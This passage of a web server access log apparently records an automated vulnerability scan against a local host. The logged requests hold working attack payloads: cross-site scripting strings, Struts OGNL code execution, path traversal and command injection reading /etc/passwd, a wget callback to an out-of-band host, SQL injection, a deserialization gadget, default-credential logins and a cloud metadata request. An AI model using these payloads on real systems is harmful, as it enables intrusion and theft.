HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MTtX5EYC9hXUUofzIkAoEVlI')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plesk-stat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"userName=admin&userPassword=dolphinscheduler123","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dolphinscheduler/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"username=guacadmin&password=guacadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"aps=c9v8h8gsmpv8c1qg07h08tbcdfz9ek9s8.oast.fun&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%60297MTm7Qs9tUhNNyxAFoGOzIuSx%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h0sykohhuxyb1wn.oast.fun%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.748","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.102","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mainfunction.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.100","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.094","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/guestimage.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.121","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.108","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'297MU04YJErvAbpqGryv2DBVHFc'); INSERT INTO extra_field_options(option_value) VALUES ('297MU04YJErvAbpqGryv2DBVHFc'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '297MU04YJErvAbpqGryv2DBVHFc', 16,0) ON DUPLICATE KEY UPDATE tag='297MU04YJErvAbpqGryv2DBVHFc', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.120","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.119","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.007","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.152","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) 